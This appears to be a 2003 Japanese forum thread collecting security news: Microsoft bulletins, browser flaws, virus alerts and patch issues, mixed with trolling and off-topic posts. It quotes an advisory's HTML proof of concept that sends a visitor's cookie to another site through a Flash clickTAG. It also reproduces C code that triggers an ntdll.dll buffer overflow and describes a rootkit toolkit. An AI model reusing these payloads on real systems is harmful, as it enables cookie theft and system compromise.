Windows 2003 Server
web版、スタンダード版、エンタープライズ版
ボリュームライセンスのキー流出
ttp://news.com.com/2100-1009-995879.html?tag=fd_lede1_hed

■Opera 7とNetscape 7.02にサービス拒否攻撃受ける弱点
http://biztech.nikkeibp.co.jp/wcs/leaf/CID/onair/biztech/inet/240693
原文: http://www.secadministrator.com/articles/index.cfm?articleid=38590

http://www5b.biglobe.ne.jp/~ryo-kyo/osu.html

http://my.vector.co.jp/servlet/System.FileDownload/download/ftp/0/279026/pack/win95/game/table/pachinko/sikisai.lzh

あぼーん

■Microsoft VMにまた脆弱性(MS03-011)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-011ov.asp

■Microsoft Proxy Server 2.0とISA Server 2000にDoS攻撃に対する脆弱性(MS03-012)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-012ov.asp

>>302-303
MSのこういうのって、やっぱいままでのように本文を貼り付けたほうがいいのかしら。

火戸
王里
土鬼

口兄
メ几
木又

OSの再インストール今日やるんじゃなかった…。
WindowsUpdate重杉…＿|￣|○

>>304
個人的には、貼り付けない方が良いと思う。

ういんどーずあぷでーと　しるのはいいが
途中でエラーになるよ(;´Д`)
２０００も９８もだめだめぽ
漏れだけかな。。。(;´Д`)

平成15年度 自作板PC環境調査 最新結果

Windows XP Family　60　46.9%
Windows 2000 Family　44　34.4%
Windows 9x Family　11　8.6%
Windows NT Family　2　1.6%
その他　11　8.6%

xpで自動更新が途中でコケたっぽくて
yahooや朝日コムなどの一部のＨＰが見れなくなった…。

ふーん

>>310
プロバイダがnifｔｙ？

>>310
うちも大きいサイトほとんど見れない。
２ちゃんねるも見れる板と見れない板がある。
インストール前に復元してもダメ（削除できない）し、どーしよー

>>313
板違い

Avex CCCDにWindowsの基本ファイルを(セキュリティホールのあるかもしれないバージョンに)
書き換えるおそれ(未確認情報)

http://memo.st.ryukoku.ac.jp/archive/200304.month/5722.html
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/04.html#20030411_cccd

＞http://memo.st.ryukoku.ac.jp/archive/200304.month/5722.html

セキュリティ問題以前に、たかがCD聞くために
システムを*勝手に*弄られるのはどうかって感じだね

CCCDはプロテクトとデータの間のところにセロテープとめれば無効にできるって本にかいてあったよ。

>>317
それプロテクト解除

Misuse of Macromedia Flash Ads clickTAG Option May Lead to Privacy Breach
http://www.securiteam.com/securitynews/5XP0B0U9PE.html
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/04-15.vpress.txt
<HTML><HEAD>
<meta http-equiv=Content-Type content="text/html; charset=SHIFT_JIS">
<TITLE>banner</TITLE>
<script language="JavaScript">
<!--
function openWindow() {
win=window.open("http://サイトＡ/banner_b.swf?clickTag=javascript%
3Awindow.open%28%27http%3A%2F%2Fwww.サイトＣ/message.html%3F%27+%2B+
document.cookie%2C%27_top%27%29","popup",'statusbar.visible =　false,
scrollbars=1,width=400,height=60');
}
//--></script></HEAD>
<BODY bgcolor="#FFFFFF" onLoad="openWindow();">
hoge</BODY></HTML>
http://www.zakzak.co.jp/info/koukoku.html
http://www.macromedia.com/resources/richmedia/tracking/designers_guide/

（＾＾）

なんかアップデートされた

Windows カーネル メッセージ処理のバッファ オーバーランにより、権限が昇格する.
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-013ov.asp

ネット経由では出来んみたいやけど。

test

IEとOutlook Expressに「緊急」の脆弱性
IEに4つの脆弱性が見つかり、米Microsoftが累積パッチをリリース。
同時にOutlook Expressの累積パッチもリリースされた。最大深刻度は「緊急」

http://www.zdnet.co.jp/news/0304/24/nebt_06.html

IEのパッチ
http://www.microsoft.com/windows/ie/downloads/critical/813489/default.asp

OEのパッチ
http://www.microsoft.com/windows/ie/downloads/critical/330994/default.asp

金太きたよ

　金太きたよ

　　金太きたよ

　　　金太きたよ

　　　　金太きたよ

　　　　　金太きたよ

　　　　　　金太きたよ

　　　　　　　　金太きたよ

　　　　　　　　　金太きたよ

金太きたよ

http://www1.neweb.ne.jp/wb/prof/
平成15年度 自作板PC環境調査 最新結果（一部抜粋）
Version: r27.45　Release date: April 10,2003　up to 265res.

平均年齢　　　　　　　 25.4歳

ネット(2ch含)　　　　　　78.7%
ゲーム　　　　　　　　　 59.0%

Windows XP Family　　　　46.9%
Windows 2000 Family　　　34.4%

Athlon　　　　 45.3%
Pentium 4　　　　 29.7%

平均RAM搭載容量 780MB

平均HDD搭載容量 166GB

nVIDIA 49.2%
ATI 28.9%

DVD-R/RW/ﾏﾙﾁ 20.4%
CD-R/RW 75.9%

光ファイバー 8.3%
ADSL/xDSL 64.5%

CRT 74.6%
LCD 25.4%

Windows 2000と同じセキュリティ・ホールがWindows NTに見つかる

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/2/

■「shlwapi.dll」が原因で簡単なWebサイトでDoS攻撃を受ける可能性のある脆弱性
〜現在マイクロソフトから修正パッチは提供されていない
http://internet.watch.impress.co.jp/www/article/2003/0425/dll.htm

■SARSに便乗したウイルス「コロネックス」が出現、注意呼びかけ

　トレンドマイクロなどコンピューターウイルス対策ソフト各社は中国などで流行して
いる新型肺炎、重症急性呼吸器症候群（ＳＡＲＳ＝サーズ）に便乗したウイルス
「コロネックス」を発見したと発表した。
(中略)
　メールの件名や添付ファイル名に「ｃｏｒｏｎａ（コロナ）」「ｈｏｎｇｋｏｎｇ（香港）」などの
単語を使い、ＳＡＲＳ情報の提供を装う。ファイルを開くと感染、アドレス帳の
全アドレスに自己複製メールを送信する。無駄なデータで構成されたファイルを
勝手に作成して記録領域を占有。マイクロソフトのネット閲覧ソフト「インターネット
エクスプローラー」では、起動直後に世界保健機関（ＷＨＯ）のホームページが
表示されてしまう。　
(以上、2003年4月28日のNIKKEI NETより一部引用―全文は引用元を参照)

引用元: http://it.nikkei.co.jp/it/news/newsCh.cfm?i=2003042703773j0

■Operaに複数の脆弱性

[Opera 7/6] ダウンロード時の長い拡張子で起こる
ヒープバッファオーバーランによる脆弱性
http://opera.rainyblue.org/modules/cjaycontent/index.php?id=5

[Opera 7] JavaScriptコンソールにおける任意のスクリプト挿入による脆弱性
〜 Yet another story of "Phantom of the Opera" 〜
http://opera.rainyblue.org/modules/cjaycontent/index.php?id=6

よくまぁ次々と出るわ出るわ(`_ゝ´)ﾌｫｫー

Windows XPに修正パッチをあてると、パフォーマンスが低下する不具合
http://internet.watch.impress.co.jp/www/article/2003/0428/xp.htm

パッチ適用後にOutlook Expressなどが正しく動かない不具合の対処法が公開
http://internet.watch.impress.co.jp/www/article/2003/0428/oe.htm

>>340
おお！情報Thx　何か最近ﾊﾟﾌｫｰﾏﾝｽが低下
（特に右クリック関連の動作が引っかかる）
してて　おかしいと思ってたところでした。
削除したら ｻｸｻｸ動くようになった
いつぞやのｱﾄﾞﾋﾞｱｸﾛﾊﾞｯﾄ5の不具合も参ったが
今回も悩んでました。

age

あぼーん

「メール本文を開くだけで感染するウイルスに注意」――IPA
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030501/1/

■Adobe Acrobat 5.0.5に任意のコードを実行できる脆弱性、パッチの適用を
http://internet.watch.impress.co.jp/www/article/2003/0502/adobe.htm

Adobeのアナウンス:
http://www.adobe.com/support/downloads/detail.jsp?ftpID=2121 (英文)
http://www.adobe.com/support/downloads/detail.jsp?ftpID=1438 (英文)

■米セキュリティ研究者、Web申込で郵便物大量送付攻撃の危険性を指摘
http://internet.watch.impress.co.jp/www/article/2003/0502/pattack.htm

ふむ。

http://slashdot.jp/article.pl?sid=03/05/02/2151212&topic=16&mode=thread
平たくいうと、Becky! を標準のメーラにしてる場合、mailto: をクリックしただけで
コンピュータの中のどんなファイル(当然クリックしたユーザがアクセスできる範囲だが)
でも勝手に送信させることができるんだと。

>>347
mailto: をクリックしなくても、Webページを見ただけでだめな場合もあるのね。
それより、RimArtsの対応のほうがちょっと気になるかも。

>>347-348
パッチが当たった修正版がリリースされました。

数日前にVulnWatchに出ていた。ICQ Liteにはこの脆弱性はない模様。

ICQに深刻な脆弱性
http://www.zdnet.co.jp/news/0305/07/nebt_16.html

Netscape 7.02以前にcookie漏洩などの脆弱性
http://slashdot.jp/article.pl?sid=03/05/03/082215
GnuPGの鍵検証機能にバグ発覚、バージョン1.2.2リリース
http://slashdot.jp/security/03/05/07/0443218.shtml?topic=28

あぼーん

Microsoft TechNet http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-017.asp
"Flaw in Windows Media Player Skins Downloading could allow Code Execution"

日本語版の説明は後日掲載、とのこと

Windows Media Playerのスキン機能にセキュリティホール
http://www.zdnet.co.jp/news/0305/08/ne00_wmp.html

9.0は問題なし。問題があるのは7.1と8.0

■Windows Media Playerセキュリティ・ホール関連

http://biztech.nikkeibp.co.jp/wcs/j/comp/245716i

昨日の段階でVulnWatchメーリングリストに出てたんだけど、時間とれなかった。スマソ。

私が最初に見かけたメール(英語)
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0059.html

+のスレ:
【IT】.NET Passportにアカウント乗っ取りの大穴、Hotmailが読まれる可能性も
http://news2.2ch.net/test/read.cgi/newsplus/1052414281/

Slashdot Japan
http://slashdot.jp/security/03/05/08/1650228.shtml?topic=57

セキュリティーmemoの高木さん、何か嫌なことでもあったのかな。
もしくはカルシウムが足りない。怒りすぎ

>>357
あのぐらいなら、いつもの範囲内かなと。
あの持ち味がなくなると、それはそれで彼らしくないし(素)。

>>357 ML見てないから分かんないけど、
高木さんって結構琴線に触れると(って違う意味だけど)良くキレるよ。
Java-House MLあたり見たらすごいよ(^^;

>>359
もちろん、そういう意味っす(w。 < いつもの範囲内
# このスレではこの話題はこのぐらいでよろしいかと。

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-017.asp

2003/5/12: このセキュリティ情報を更新し、「テストしたバージョン」 の欄に Windows Media Player 6.4 を含めました。
また、Windows Media Player 6.4 がこの脆弱性の影響を受けないことを明確にしました。

あぼーん

新ウイルス「Fizzer」感染拡大
http://headlines.yahoo.co.jp/hl?a=20030513-00000025-zdn-sci

>>362

■IP Messenger for Win ver 2.02 以前に Buffer Overflow の脆弱性
http://www.lac.co.jp/security/intelligence/SNSAdvisory/64.html

いちおうセキュリティがらみということで

マイクロソフトのWindows Server 2003、課題はやはりセキュリティ
http://japan.cnet.com/news/ent/story/0,2000047623,20054367,00.htm

◆IEにセキュリティ・ホール，スクリプトを無効にしても攻撃を受ける

パッチを適用しても、攻撃を受ける可能性！

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030517/1/

>>367
http://slashdot.jp/security/03/05/18/1927234.shtml?topic=41
では再現できたらしい。
frame 開きまくりってのは今までもブラクラとして典型的な方法なので(((；ﾟДﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
IE のあぼーんは避けられないものの、悪意ある外部のプログラムの実行を
回避する方法は一応あるようでつ。

回避策が会員にしか見えないってなんだよ！

>>369
回避策はセキュリティホールmemoのテスト結果まんま。
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/05.html#20030516_ie

MSサポートを装うウイルスに注意
http://headlines.yahoo.co.jp/hl?a=20030519-00000003-zdn-sci

シマンテックは5月18日、マイクロソフトのユーザーサポート担当を
装ったメールでPCに侵入する「W32.HLLW.Mankx@mm」について警告した。

Netscape/Mozillaに偽のURL表示が可能な脆弱性
http://slashdot.jp/article.pl?sid=03/05/18/157210&topic=51

>>368
６だけでなく５（2000SP3)でも可能。

>>373
5.5?
5.01（2000SP3)なら再現しなかったけど。

5.01(2KSP3)で再現したよ
ただ、古いPC(160MHz)だと「実行」される以前に
IEがクラッシュする
frame自体はProxomitronで防げるけど

おまえら！
kageをﾀﾞｳｿできません

>>374
5.01SP3＋α（パッチ）。タブブラでもダメ。
2000でしか5.01はもうサポートされてないから、
穴が見つかったらとりあえず自分で検証したほうがよさそう。

>>374
うちの環境(2ksp3,ie5.01)でも再現しないなぁ。
デュアルで入ってるMEの6.0なら再現したが。

IE以外の何かが不味そうだな。

なんか今アップデートしてるxmlの何とかって

dolby ac-3 再生できない？

セキュリティ問題の修正プログラム - 2002 年 2 月 13 日 (MSXML 4.0)

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

>>382
まじうざい

あぼーん

荒らしがいっぱい。

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

■ Buffer overflows in multiple IMAP clients
(bugtraq, Thu, 15 May 2003 03:49:20 +0900 (info from INTERNET Watch))
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20030516_imap
複数の IMAP クライアントに欠陥。リテラルサイズやメールボックスサイズが巨大な場合に、
クライアントが crash したり、IMAP サーバから任意のコマンドを実行させたりできてしまう。

2003.05.20 追記:
　Becky! にもこの問題があり、Ver2.06.02 で修正されたそうだ。

SQL Server 2000 Service Pack 3a、MSDE 2000 Service Pack 3a について
http://www.microsoft.com/japan/sql/downloads/2000/sp3.asp

新しいSP3a では、以前の SP3 から次の点が変更されています。
SQL Server 2000 120 日間限定評価版への SP3a の適用が可能になりました。
Microsoft Data Access Components (MDAC) version 2.71a を含んでいます。
このバージョンは、814572 (英語) と 814410 (英語) に記載されている問題を修正しています。
ネットワークが使用できない場合に、1434 ポートへのリスニングを行いません。

あぼーん

Windowsは穴だらけっ

あぼーん

あぼーん

Windows XPなどでエクスプローラの項目右クリックすると・・・

http://internet.watch.impress.co.jp/www/article/2003/0527/windows.htm

XPのアップデートに問題
http://live2.2ch.net/test/read.cgi/news/1054106512/

どのアップデートかわかりません。番号かなにかないのかな・・・

あぼーん

>>394
お前、Windowsupdateを知らないだろ。使ったことはないだろ。

◆MSサーバーに4種類の新たなセキュリティ・ホール

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030529/1/


今回は一度に４つの大盤振る舞い！！

Windows XP セキュリティ修正プログラム : Windows カーネル メッセージ処理でバッファがオーバーランすると、特権の昇格が発生する
http://microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=9F81E615-3DEC-4A4B-826A-4E0FEAB42323

しばらく来ない間にこのスレも荒れたね。
811493と言うパッチについて詳しく知ってる人いませんか？

ウイルスチェックしてみたずら

http://lounge.dip.jp/~yoshinoya_off/up/data/Viruscheck.jpg

あぼーん

>>396
使ってます。でも公開した日付ってどこで見れるのかわからないんです。

>>399
811493は怖いので様子見です。
過去に何人も悲鳴をあげているようですし

windows update失敗したらあげるスレ 3
http://pc2.2ch.net/test/read.cgi/win/1040217939/

あぼーん

あぼーん

あぼーん

あぼーん

>>402
あぁ、更新履歴を(ry

2003/5/29 : このセキュリティ情報ページを更新し、パフォーマンス問題を修正する改訂版の Windows XP Service Pack 1 用の修正プログラムが利用可能となったことをお知らせしました
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-013.asp


http://jp.fujitsu.com/itj/

あぼーん

>>408
あ、恐れ入ります

[FIX] RPC の不具合により ASP/COM+ アプリケーションでスレッドが応答を停止する
http://support.microsoft.com/default.aspx?scid=kb;ja;814119
この問題による影響があるのは、Microsoft Windows 2000 Service Pack 3 (SP3) です。

現象
プロセス間の COM 呼び出しを実行する ASP アプリケーションがリモート プロシージャ
コール (RPC) の不具合の影響を受ける可能性があり、そのためにスレッドが応答を停止
(ハング) することがあります。

この不具合は、以下の Windows Update の重要な更新を含む、複数の SP3 以降の
修正プログラム内に存在します。
331953 [MS03-010] RPC エンドポイント マッパーの問題により、サービス拒否の攻撃が実行される

また、要求があった場合にのみ Microsoft Support から提供している修正プログラムの中にも、
この不具合の存在するものが複数あります。 (略)

>411
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/03.html#20030328_MS03-010
2003.05.12 追記:
この patch はサポートからしか入手できないようだ。

2003.05.28 追記:
日本語 OS 用の patch はまだ存在しないようだ。必要な人はサポートに問いあわせよう。

マイクロソフト サポート技術情報 - 821817
ActiveX の実行ダイアログを表示すると 他アプリケーションへの切り替え表示ができなくなる
http://support.microsoft.com/default.aspx?scid=kb;ja;821817

Internet Explorer では、[インターネットオプション] - [セキュリティ] タブ内の設定により、
ActiveX の実行に対して警告を表示することができます。
このダイアログは、「ActiveX コントロールやプラグインなどのソフトウェアを実行できるようにしますか？」
のメッセージが表示され、実行するかどうかについての確認が行われます。
このダイアログを表示して ActiveX を実行した後に、アプリケーションを切り替えを行った場合、
切り替えたアプリケーションが最前面に表示されれず、Internet Explorer が最前面に表示され
続ける場合があります。

Windows Media サービスの ISAPI エクステンションの問題により、
サービス拒否が起こる (817772) (MS03-019)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-019.asp
このセキュリティ情報の対象となるユーザー :
MicrosoftR Windows NT 4.0 Server または Microsoft Windows 2000 Server を
ご使用のシステム管理者

http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/05.html#20030529
Microsoft によると、MS03-019 は「警告」「これはサービス拒否の脆弱性です」に
なっていますが、 eEye の Marc Maiffret 氏によると exploit 書ける (実証済み)
だそうなのでご注意あれ。

http://www.microsoft.com/japan/technet/security/bulletin/MS03-018.asp
Internet Information Service 用の累積的な修正プログラム (811114) (MS03-018)

818043 Windows XP 用推奨修正プログラムの適用後にネットワークに接続できない
http://www.microsoft.com/japan/support/sokuho/default.asp
Windows Update サイトより 818043 Windows XP 用推奨修正プログラムをリリースした後、
この修正プログラムを適用したコンピュータで、ネットワークに接続できなくなる問題が発生
することが確認されました。
本件につきましては、現在弊社にて調査中ですが 818043 の修正プログラムを適用後、
お使いのコンピュータよりネットワークに接続できない問題が発生した場合には、下記の手順で
修正プログラムをアンインストールすることで以前の構成に戻すことができます。

1. [スタート] メニューより、[コントロールパネル] を開きます。
2. [プログラムの追加と削除] を起動して一覧より、現在インストールされているプログラムの一覧
をご確認ください。
3. 該当する修正プログラム [Windows XP Hotfix (SP2) Q818043] が一覧に表示されている場合
には、[削除] を選択してアンインストールしてください。

ご迷惑をお掛けしましたことを、心よりお詫び申し上げます。

【1:1】【yahoo】違法販売【オークション】
1 名前：名無しさん 03/05/31 15:02 ID:w+EyhvXB
http://search.auctions.yahoo.co.jp/jp/search/auc?p=office+2003&auccat=0&alocale=0jp&acc=jp
http://www.microsoft.com/japan/legal/Enforcement/Auction/faq/NFR/QA1.asp

通報はこちらへ
http://www.microsoft.com/japan/legal/enforcement/report/form.asp

助けて下さい

私の掲示板に山崎渉が現れ荒らします。
私が消しても消してもどんどん書き込まれます。
どなたか助けてはいただけないでしょうか。
にちゃんねらーの力を私は信じています。

このスレが一番荒らされています↓
http://jbbs.shitaraba.com/computer/bbs/read.cgi?BBS=3011&KEY=1030724122

[Windows XP] ntdll.dll内の関数で起こるバッファオーバーフローによる脆弱性
http://opera.rainyblue.org/modules/cjaycontent/index.php?id=7
#include <windows.h>#include <stdio.h>
void vuln_func(wchar_t *long_string)
{wchar_t *tmp_wc;
wchar_t buffer[0x100*2];printf("ready ... \n");
//// about GetFullPathName// http://msdn.microsoft.com/library/en-us/fileio/base/getfullpathname.asp
//// RtlGetFullPathName_U is called from GetFullPathNameW.
//GetFullPathNameW(long_string, 0x100, buffer, &tmp_wc);
// No return here.printf("returned\n");
}const int vuln_length = 0x10010;// 0xFFFF & 0x10010 == 0x10
int main(){wchar_t *p = new wchar_t[vuln_length + 32];
memset(p, 0x90, vuln_length*sizeof(wchar_t));
p[vuln_length] = 0;vuln_func(p);
delete[] p;return 0;}

●　新日本主義思想 (Neo Japanism)


新日本主義思想(Neo Japanism)とは、
いまNET上の若者の間で広まっている、
日本を軍事力、経済力、共に強い国にするという思想である。

景気回復や世界をテロやテロ支援国家などから守り
世界平和を実現するために、軍事力大幅強化や徴兵制の復活、
集団的自衛権の保有、スパイ防止法の制定、
軍需産業の復活等を目標と掲げている例が多い。

そして個々人の思想によって解釈が異なることが
最大の特徴とされる新しい時代の言論である。

MS03-020: Internet Explorer 用の累積的な修正プログラム (818529)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp

あぼーん

■■ガンダムパソコン限定再発売■■
　　ガンダムパソコン　”CHARモデル”
「機動戦士ガンダム」より、待望の”赤いNOTE　PC”が再び登場！詳細はこちらから！
他では手に入らない！”完全受注生産品”となります。
●第2回受付中！

　　　販売価格：\198,000円(税別)

http://click.linksynergy.com/fs-bin/click?id=dKVflFQ0Dy4&offerid=43069.10000034&type=4&subid=0

　ご注文締め切り日　6月30日（月）午後3時予定

http://honyaku.naver.co.jp/ktj.html?css_url=http://kr.dailynews.yahoo.com/headlines/so/20030605/gd/gd200306051114214317.html

蓮華写真後遺症に苦しむという "あ...."という IDのネチズンは "身を掻くようになって理由のなく寒気だって及ぶ具合"と言いながら "どんな人がこのように猟奇的な組写真を国内インターネットに移して来たのか怨しい"と吐露した.

Dサイト側は "精神的被害を被ったネチズンが多い位今度事件をサイバー犯罪捜査隊に捜査依頼する計画"と明らかにした.

ほ

し

http://biztech.nikkeibp.co.jp/wcs/j/comp/250866i

http://www.raus.de/crashme

http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/06.html#20030606_MS03-020
IE 5.01 / 5.5 / 6 に新たに 2 つの欠陥。

1. object タグの type 属性の処理に欠陥があり、buffer overflow が発生する。
このため、悪意ある web サイトや HTML メールによって任意のコードを実行させられる恐れがある。
参照: Internet Explorer Object Type Property Overflow (eEye)。 CVE: CAN-2003-0344
2. ファイルのダウンロードダイアログの処理に欠陥があり、 frame / iframe を大量に記述することで、
任意のコマンドを誰でも簡単に強制実行させることができてしまう。
参照: Flooding Internet Explorer 6.0.2800 (6.x?) security zones !。CVE: CAN-2003-0309

patch があるので適用すればよい。ただし、手元の Windows XP SP1 + IE 6.0 SP1 で確認した限りでは、
この patch を適用しても、Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! のデモプログラム
http://www.malware.com/forceframe.html を試すと、コマンドこそ実行されないものの、
IE はクラッシュしてしまう。

マイクロソフト サポート技術情報 - 818529
[IE] [MS03-020] Internet Explorer 用の累積的な修正プログラム (2003 年 6 月)
http://support.microsoft.com/default.aspx?scid=kb;ja;818529
なお、Microsoft Windows Server 2003はこの累積パッチの対象です。

http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/06.html#20030606_4260
■ 4.2.60スキャンエンジンリリースに関するご案内
(NAI, 2003.06.06)
最新のスキャンエンジン 4.2.40 において、ごく稀 (報告件数: 全世界で 1 件) にだが、
Windows のレジストリ全てを削除してしまう場合があるという。スキャンエンジン 4.2.40 を
使っていても、影響を受けるアプリと受けないアプリがあるので注意。
(一覧はリンク先を参照してください)

影響を受けるアプリでスキャンエンジン 4.2.40 を使用している場合は、この問題を修正した
スキャンエンジン 4.2.60 が登場するので、これに入れかえる。 2003.06.26 に登場する
Weekly SuperDAT で 4.2.60 にアップグレードするのが推奨のようだ。

>>429
また例によって「小マシ」になった程度か・・。
IE3.0xのときも確かリンクファイル絡みでこんなことがあったな

あぼーん

http://www.doupe.cz/vaulty/finalfantasy/movies/realemotion.wmv

あぼーん

あぼーん

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030610/1/
「Microsoft VMをアンインストールする手段を提供する」――マイクロソフト

会社のサーバーに入ったメールって簡単に
発信者がワレるものなんですか？

プロバイダーってすぐ個人情報出すんですか？

あぼーん

お忙しいとこスミマセン。
ちょいと書き込みさせて下さい。

【YBB】モデム利用者の個人情報が流動化に
http://pc3.2ch.net/test/read.cgi/isp/1055262847/l50
ユーザーにレンタル提供しているADSLモデムや無線LANカードなどの「接続機器レンタル規約」を
6月24日から改定する。

現在、レンタルモデムの所有者はソフトバンクBBとなっているが、モデムの証券化を行なうことで、
レンタルモデムの所有者が変わることになる。
改定された規約では、モデムの新所有者に対し、モデム利用者の個人情報を開示することを可能にするなど、
流動化に向けた条項が追加された。また、会員が利用中のモデムの所有権移転を拒否できることも明確に記された。

これじゃあ、セキュリティー以前の問題だな。

マイクロソフト の Securing Windows 2000 Server ソリューション
http://www.microsoft.com/japan/technet/security/prodtech/windows/secwin2k/default.asp

Microsoft におけるコンピュータの脆弱性の管理
http://www.microsoft.com/japan/technet/itsolutions/msit/security/mscomvul.asp

インシデント対応 : Microsoft 社内におけるセキュリティ管理
http://www.microsoft.com/japan/technet/itsolutions/msit/security/msirsec.asp

Microsoft におけるネットワーク境界のセキュリティ
http://www.microsoft.com/japan/technet/itsolutions/msit/security/twcomp.asp

提供方法や時期については未定だが，Microsoft VMをアンインストールするため
のツールを提供する準備がある
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030610/1/

Windows 2k rootkit
http://www.st.ryukoku.ac.jp/~kjm/security/memo/ より
Windows 2k rootkit incident, files zipped for your pleasure.
と フォロー (incidents ML)。Hacker Defender rootkit をぐぐって
みたら Apple Tree - SMB/CIFS Auditor (theblog.hypermart.net)
というのをみつけました。445/tcp からヨワヨワパスワードを攻撃
して、成功したら rootkit やら vnc やら keylogger やらを植えつ
けられる tool のようです。 log cleaner もついてますね。

Windows 2k rootkit incident, files zipped for your pleasure.
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/incidents/2003.06/msg00100.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/incidents/2003.06/msg00105.html

Apple Tree - SMB/CIFS Auditor
http://theblog.hypermart.net/thurstonia/appletree.shtml

ノートン大先生の分析結果
beenhaxxored.zip
ファイル名: mfxp_tlist_.exe 結果: デベロッパーノートを参照してください。
ファイル名: mfxp_sperm.exe 結果: デベロッパーノートを参照してください。
mfxp_tlist_.exe contains no malicious code
although it can be used for malicious purposes
and it represents a security risk. It is safe to delete this file.

mfxp_sperm.exe contains no malicious code
although it can be used for malicious purposes
and it represents a security risk. It is safe to delete this file.
The files submitted do not contain malicious material.
They do represent a security risk, so you should delete these files.
このファイルは悪質なものではありませんが、あなたのコンピュータ上で
知らないうちに動作しています。このファイルを削除することをお勧めします。

マイクロソフト、自社製品の脆弱性をやさしく説明する Web サイト
http://headlines.yahoo.co.jp/hl?a=20030616-00000016-inet-sci

○「絵でみるセキュリティ情報」
http://www.microsoft.com/japan/security/security_bulletins/

■マナー、ルール無用のDQN犯珍ファン！　不祥事続出！　逝ってよし！
03.05.23　阪神ファンの男、無免許で飲酒運転で逮捕(10年前から免許取り消し処分中)
http://www.daily.co.jp/society/2003/05/24/083176.shtml
03.06.11　阪神戦で催涙ガス？　51人手当て２人入院
http://www.nikkansports.com/ns/baseball/f-bb-tp0-030611-0033.html
03.06.15　阪神ファンの男、警備中の警察官に暴行、首に軽傷を負わせ公務執行妨害で逮捕
http://www.zakzak.co.jp/top/t-2003_06/1t2003061615.html

●おまけ
85.05.23　阪神ファン、福井線審にチェーン投げ顔面に ＆ 阪神電車止める
85.06.30　阪神ファン、試合中止に怒りグランド乱入しリリーフカー奪う
http://www.nikkansports.com/osaka/otr/p-otr-030613-07.html
　　　　

あぼーん

あぼーん

あぼーん

Win2000SP4、７月にも日本語版配布開始らしいな。
http://pcweb.mycom.co.jp/news/2003/06/16/20.html

あぼーん

○IEの新しい累積パッチにはいくつかの注意点
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030617/1/

重要な更新きたね

「MS03-021: Windows Media Player の問題により、メディア ライブラリがアクセスされる (819639)」

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-021ov.asp

ttp://download.microsoft.com/download/5/4/0/540f9efd-6078-4409-a007-73e14d055b63/WindowsMedia9-KB819639-x86-JPN.exe

ウィルス対策各社、「SOBIG.E」ワームへの注意呼びかけ
http://headlines.yahoo.co.jp/hl?a=20030626-00000015-inet-sci

IEブラウザに新たな欠陥：米マイクロソフトは「調査中」
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm

あぼーん

★Windows 2000 Serverにセキュリティ・ホール
http://biztech.nikkeibp.co.jp/wcs/j/comp/254250i

恐れ多くて聞きづらいのですが、
MSNメッセンジャーを入れたのですが、毎日頻繁にメッセンジャーサービスとかいって
半角カタカナの羅列みたいなメッセージがくるんです。
ネットゲーム中とかもくるので非常に困ってます。アンインストールしてもくるんですTT
どうすれば対処できるのでしょうか？ちなみに会社のPCだと来ません。

>>459
ｷｼｭﾂ
本来はネットワーク管理者用がメッセージを送るのに使われるのを、
悪用されてるだけ。
MSNメッセンジャーと多分関係ない。
らしいでつ (´･ω･｀)

そうなんですか...
ご迷惑ついでに伺いたいのですが、対処法はあるのですか？

>>461
んもう！
http://messenger.microsoft.com/JA/support/knownissues.asp

hmmなるほど...ありがとうございます。

つまりファイヤーウォールをつかわないと対処できないと言うことですか...
(;´Д`)

ばかばっかりね　プ

ぐわぁぁーーーっ　削除願い　↑　
メアドが勝手に　管理人さん消してくださいペコペコ

ajtmgr
@
pdx.ne.jp

会社のＰＣがBBOYつーのくらったらしいけどどうよ

あぼーん

ここですか？ばかばっかりの田口さんは？

811493　XPのセキュリティ問題の修正プログラムをインストールしたあとに
updateサイトのインストールの更新をしてみると同じ811493のプログラムがあるんです。

なんでなのかよくわかりません。解る方教えてください。

気にするな

>>471
インストールの更新履歴には「成功」とあるんですが。
自動更新にも同じプログラムがインストールの準備できました。と、お知らせしてくるんです。

なんでだろう。

>>463
コンピュータの管理からサービス開いて「Messenger」の項目を手動にしとけ

■IEブラウザに新たな欠陥：米マイクロソフトは「調査中」
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm

http://ringonoki.net/tool/kaizou/samurize.html（林檎の木の紹介）
このSamurizeっていうアプリの、ウィルス情報表示スクリプト便利ですよ。


【サムライマスター】Samurize Part8【暇人】
<a onClick=

ｽﾏｿ途中で切れた

【サムライマスター】Samurize Part8【暇人】
http://pc2.2ch.net/test/read.cgi/software/1055494635/
